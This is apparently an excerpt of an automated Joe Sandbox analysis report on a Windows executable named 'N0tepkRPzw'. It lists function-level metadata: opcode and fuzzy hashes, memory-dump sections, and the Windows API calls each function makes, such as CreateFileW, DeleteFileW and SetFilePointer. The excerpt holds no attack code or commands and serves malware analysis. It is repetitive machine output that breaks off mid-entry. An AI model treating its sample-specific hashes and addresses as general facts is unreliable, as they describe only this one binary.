              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: 283abb5ae80ad5682fb28b7c764f58dbdc945404ab942f83407cfc5119ef7e37
              • Instruction ID: facdab630de274ab82f01cc1de3146b06597c10e705554f33a45f2cd24eed959
              • Opcode Fuzzy Hash: 283abb5ae80ad5682fb28b7c764f58dbdc945404ab942f83407cfc5119ef7e37
              • Instruction Fuzzy Hash: A2D012217817346ED61032967C039AABE44CA01FB5B454192FE0C5A256B561455453F9
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E20B
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID: 3To
              • API String ID: 1269201914-245939750
              • Opcode ID: 6f60bff6f827b649d80e653636dd0d64cf02ec9526503c6fec1f210efeabec35
              • Instruction ID: 04f2935f3759fddbddab2842288f03f468f5efa657c03e04167734de5ecc6206
              • Opcode Fuzzy Hash: 6f60bff6f827b649d80e653636dd0d64cf02ec9526503c6fec1f210efeabec35
              • Instruction Fuzzy Hash: DCB012D676E002BE320C31007D1AD76031DC9D4B60330801BF106D4080D9408D094132
              APIs
                • Part of subcall function 00D7AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D7B1A5,?), ref: 00D7AF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D7B1EA,?,00000000), ref: 00D7B3C4
              • GetCPInfo.KERNEL32(00000000,00D7B1EA,?,?,?,00D7B1EA,?,00000000), ref: 00D7B3D7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: 4d02d1de84c6f9d6d76a6f8fa24e225f2f1fb998a07682e808c0d8162ab04773
              • Instruction ID: 4706d76539f37acccbb62a3578b9e41d6fc9723e97e4472998f4e0795a2c9ebb
              • Opcode Fuzzy Hash: 4d02d1de84c6f9d6d76a6f8fa24e225f2f1fb998a07682e808c0d8162ab04773
              • Instruction Fuzzy Hash: 4651F4709002159EDB249F75C8817BEBBE5EF41328F18C56FE09A8B252F7359541CBB1
              APIs
              • __EH_prolog.LIBCMT ref: 00D51385
                • Part of subcall function 00D56057: __EH_prolog.LIBCMT ref: 00D5605C
                • Part of subcall function 00D5C827: __EH_prolog.LIBCMT ref: 00D5C82C
                • Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C86F
                • Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C893
              • new.LIBCMT ref: 00D513FE
                • Part of subcall function 00D5B07D: __EH_prolog.LIBCMT ref: 00D5B082
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: f4ee53a6d96342c8e7d80c5be5740b061533823ff01aa0d1447bde95ae6b2b42
              • Instruction ID: 84bec4c327054c9c74451c80c10d7aa25d8cb5816ef040cee1a6ce00c32ee356
              • Opcode Fuzzy Hash: f4ee53a6d96342c8e7d80c5be5740b061533823ff01aa0d1447bde95ae6b2b42
              • Instruction Fuzzy Hash: 094116B0805B40DED724DF798485AE7FBE5FB18310F544A2ED9EE83282DB326558CB25
              APIs
              • __EH_prolog.LIBCMT ref: 00D51385
                • Part of subcall function 00D56057: __EH_prolog.LIBCMT ref: 00D5605C
                • Part of subcall function 00D5C827: __EH_prolog.LIBCMT ref: 00D5C82C
                • Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C86F
                • Part of subcall function 00D5C827: new.LIBCMT ref: 00D5C893
              • new.LIBCMT ref: 00D513FE
                • Part of subcall function 00D5B07D: __EH_prolog.LIBCMT ref: 00D5B082
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 67d3972fcc0be9aba3a4561d11d1eb11fdc2922eca75e816967dbefc353f2b83
              • Instruction ID: 34663c9a337ce28bd572592d14e36f9a3e07abcf1c990e693a7b53dfc6b40a18
              • Opcode Fuzzy Hash: 67d3972fcc0be9aba3a4561d11d1eb11fdc2922eca75e816967dbefc353f2b83
              • Instruction Fuzzy Hash: 8B4127B0805B409ED724DF798485AE7FBE5FF18300F544A2ED9EE83282DB326558CB25
              APIs
                • Part of subcall function 00D78FA5: GetLastError.KERNEL32(?,00D90EE8,00D73E14,00D90EE8,?,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D78FA9
                • Part of subcall function 00D78FA5: _free.LIBCMT ref: 00D78FDC
                • Part of subcall function 00D78FA5: SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D7901D
                • Part of subcall function 00D78FA5: _abort.LIBCMT ref: 00D79023
                • Part of subcall function 00D7B2AE: _abort.LIBCMT ref: 00D7B2E0
                • Part of subcall function 00D7B2AE: _free.LIBCMT ref: 00D7B314
                • Part of subcall function 00D7AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D7B1A5,?), ref: 00D7AF46
              • _free.LIBCMT ref: 00D7B200
              • _free.LIBCMT ref: 00D7B236
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: c1a854a5700aa28347cf7b781650e54d84fa748064a76fde20ba6962cffdd904
              • Instruction ID: b9089a6f0d3d5749ccc2c156ce45b2cc18c2be455e6f48a19f60c732a46ed386
              • Opcode Fuzzy Hash: c1a854a5700aa28347cf7b781650e54d84fa748064a76fde20ba6962cffdd904
              • Instruction Fuzzy Hash: 9231D331901208AFDB10EFA9C845B6DBBE5EF41330F65809AE81C9B292FB719D41DB74
              APIs
              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D59EDC,?,?,00D57867), ref: 00D597A6
              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D59EDC,?,?,00D57867), ref: 00D597DB
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 829794050259b487d075fb7b55d5064fe53cd2da5e324565806399d6af8c10ba
              • Instruction ID: 267e6aeedd06ef5ef42e87b2fcbedff6943f40f2aed23e9854dad48e0ada57e5
              • Opcode Fuzzy Hash: 829794050259b487d075fb7b55d5064fe53cd2da5e324565806399d6af8c10ba
              • Instruction Fuzzy Hash: EB21F6B1110748EFDB308F24C885BA7B7E8EB49765F04492EFDE586191C374AC488B71
              APIs
              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D57547,?,?,?,?), ref: 00D59D7C
              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D59E2C
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: File$BuffersFlushTime
              • String ID:
              • API String ID: 1392018926-0
              • Opcode ID: 62189e1c5eea436a85c4885a54d6e790a4264c63fabbf0551de2214511a61ab8
              • Instruction ID: da805473e77297040019b705e33eb5933d8cb76a9f3dcb94493f7acdcb6dd2e4
              • Opcode Fuzzy Hash: 62189e1c5eea436a85c4885a54d6e790a4264c63fabbf0551de2214511a61ab8
              • Instruction Fuzzy Hash: 8B219E31148246EBCB14DE24C8A1AABFBF4AB95705F08481EBCC187181D239EA0C9BB1
              APIs
              • GetProcAddress.KERNEL32(00000000,?), ref: 00D7A4B8
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D7A4C5
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: 8feec840b008e776f225eb98bb0a2db28331626f9fb083e3b5ed87a84b518e4c
              • Instruction ID: e9c04c81691f8a759be97110f2c964678a24eac0aa6b0c05e07b99f26527acb1
              • Opcode Fuzzy Hash: 8feec840b008e776f225eb98bb0a2db28331626f9fb083e3b5ed87a84b518e4c
              • Instruction Fuzzy Hash: 0611E733A112209B9F219E2CEC4585E73959BC032871A8620ED1DEB254FA72DC41C7F2
              APIs
              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00D59B35,?,?,00000000,?,?,00D58D9C,?), ref: 00D59BC0
              • GetLastError.KERNEL32 ref: 00D59BCD
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: eb352023303af823261821c358d40e6372f957772a00a88ca60272625e9d2519
              • Instruction ID: 5c4b6c442f22186ffcced0f12a7606704e1526a9d8536e882381dfdacf5007dd
              • Opcode Fuzzy Hash: eb352023303af823261821c358d40e6372f957772a00a88ca60272625e9d2519
              • Instruction Fuzzy Hash: B701A131214315DB9F08CE65ACE496EF3A9AFC5722B18452DFD5687290DA31D80D9B31
              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D59E76
              • GetLastError.KERNEL32 ref: 00D59E82
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 48e66a35290b2b294c09cf4c87b6c67b977cbd3c3756e579d14ae20cddfe1e0d
              • Instruction ID: 8e00f54615dcf8f9b43716f9248c4135030fdb3bc2806bb50f527de6d404066f
              • Opcode Fuzzy Hash: 48e66a35290b2b294c09cf4c87b6c67b977cbd3c3756e579d14ae20cddfe1e0d
              • Instruction Fuzzy Hash: 760180B17053009BEF349E29D85976BB6D99B84716F14493DB956C3680DA31DC4C8730
              APIs
              • _free.LIBCMT ref: 00D78627
                • Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A
              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00D90F50,00D5CE57,?,?,?,?,?,?), ref: 00D78663
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Heap$AllocAllocate_free
              • String ID:
              • API String ID: 2447670028-0
              • Opcode ID: e12085e88b843d16eb6e8831d855f8dd0e43148efcbcd9b357a137ceb637f182
              • Instruction ID: 27f63203d9bfc7c015d868542eb206030e3362de8c85c7f3ab5a9de08a8a632c
              • Opcode Fuzzy Hash: e12085e88b843d16eb6e8831d855f8dd0e43148efcbcd9b357a137ceb637f182
              • Instruction Fuzzy Hash: 60F0C2325C1215B6DB212A25AC0DB6F2759DF91BA0F28C115F85C96191FF20C90076B5
              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00D60915
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D6091C
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: 7c82a588498322a085b624c529760cdb81dd2cd74e7b7c5e8d73dd97bb8e2c5f
              • Instruction ID: 657d4a199ada195fde8546db399cf51ed5619b78fe9a651e49f79eac28c1e990
              • Opcode Fuzzy Hash: 7c82a588498322a085b624c529760cdb81dd2cd74e7b7c5e8d73dd97bb8e2c5f
              • Instruction Fuzzy Hash: 2AE09232A20209AB6F09CEA49C048BB7B9EEB0431072C417BA80AD3201F930DE018FB1
              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A458
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A489
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 7f7b4779543ee93b428c820c667367caef4d299d8f288441956f28079d96ab32
              • Instruction ID: 11ce78d721f6003fa753ade55dc7218d5c5be2cc0d461718065a7a96b5e666b7
              • Opcode Fuzzy Hash: 7f7b4779543ee93b428c820c667367caef4d299d8f288441956f28079d96ab32
              • Instruction Fuzzy Hash: 4BF08C312402197BDF015E60DC05BD9376CAB04782F088051BD8C96261DB728AA8AB70
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: e01e24f2a2eb43d1df972118bfa596fb509fe817d2429732da27f74bc6af7483
              • Instruction ID: 546ec629667dabe46a1e0e01247a81f9b13959b56ef8fe51bf6eb3e3d61a769e
              • Opcode Fuzzy Hash: e01e24f2a2eb43d1df972118bfa596fb509fe817d2429732da27f74bc6af7483
              • Instruction Fuzzy Hash: D5F05C319003487BDB11ABB09C02FA9371EDB05746F040642BA01D31A1D9316A504B72
              APIs
              • DeleteFileW.KERNELBASE(?,?,?,00D5984C,?,?,00D59688,?,?,?,?,00D81FA1,000000FF), ref: 00D5A13E
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D5984C,?,?,00D59688,?,?,?,?,00D81FA1,000000FF), ref: 00D5A16C
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 2d1a010309e806c65199474cec398e6daa0403464d5dd821a4f82f44e380b5f9
